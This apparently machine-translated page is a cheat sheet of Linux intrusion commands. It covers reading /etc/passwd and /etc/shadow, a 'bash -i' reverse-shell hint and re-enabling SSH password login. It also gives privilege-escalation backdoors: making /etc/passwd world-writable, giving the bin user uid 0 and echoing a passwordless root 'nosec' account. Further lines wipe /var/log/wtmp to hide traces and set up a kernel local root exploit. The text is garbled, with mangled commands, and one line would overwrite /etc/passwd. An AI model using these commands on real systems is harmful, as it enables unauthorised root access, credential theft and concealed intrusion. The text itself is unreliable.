Common Intrusion commands in Linux

Catetcpasswd viewing the linux User catetcshadow viewing the User Password requires the root permission catetcsysconfignetwork-scriptsifcfg-ethnN representing the network card number viewing the ip information of the network card ifconfig viewing the local ip information catetcresolv. conf view DNS information bash-I in the reverse shel

Cat/Etc/Passwd// View linux Users

Cat/etc/shadow // The root permission is required to view the user password.

Cat/etc/sysconfig/network-scripts/ifcfg-ethn // N indicates the nic id to view the ip address of the NIC

　　Ifconfig// View the ip address of the Local Machine

Cat/etc/resolv. conf // view DNS information

Bash-I // you can use it in the reverse shell to display it intuitively.Command

Bash prompt: When you enter as a normal restricted user, you usually have a prompt similar to bash $. When you log in as Root, your prompt will become

Bash #.

System variable: Try echo $ USER/$ EUID. The system will tell you what USER it thinks you are.

Echo 1>/proc/sys/net/ipv4/if_forward is wrong, it should be echo 1>/proc/sys/net/ipv4/ip_forward,

Vim/proc/sys/net/ipv4/ip_forward. The default value is 0. That is, the kernel does not filter data packets and changes it to 1 to let the kernel filter data packets!

NetStat-GrepLISTEN grep: 80 view port

Service -- status-all grep running

Service -- status-all grep http

View running services

　　LsB _release-a view system version

Restart the ssh service:/usr/sbin/sshd stop

/Usr/sbin/sshd start

In the ssd_config File

PasswordAuthentication no,

Change it

PasswordAuthentication yes

Remote ssh Login

Otherwise, Access deni is displayed.Ed

Usepam yes may be used to establish the pam login method, for example, from other linux Hosts ssh to the server. If it is disabled, it cannot be enabled.

　　SuCainiao usage

Chomod 777/etc/passwd first

Then modify the bin user's gIdAnd uid is 0

Then passwd sets the bin password.

ThenCp/Bin/bash/sbin/nologin

Then, the su-bin can be used to access the rootshell.

This principle is that when ssh does not allow the root user to log on to the ssh terminal, we do not know the root password.

You can also

　　Sed-I s/bin: x: 1: 1/bin: x: 0: 1/g/etc/passwd

Gcc prtcl2.c-o local-static-Wall

Echo nosec: x: 0: 0: // bin/sh>/etc/passwd

Echo nosec:-1:-1:-1:-1:-1:-1:->/etc/shadow

Clear the last record cp/dev/null/var/log/wtmp

-----

　　DdIf =/dev/zero of = yourFileBs = 10 M count = 10 create a large M file to be used in Elevation of Privilege using Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit.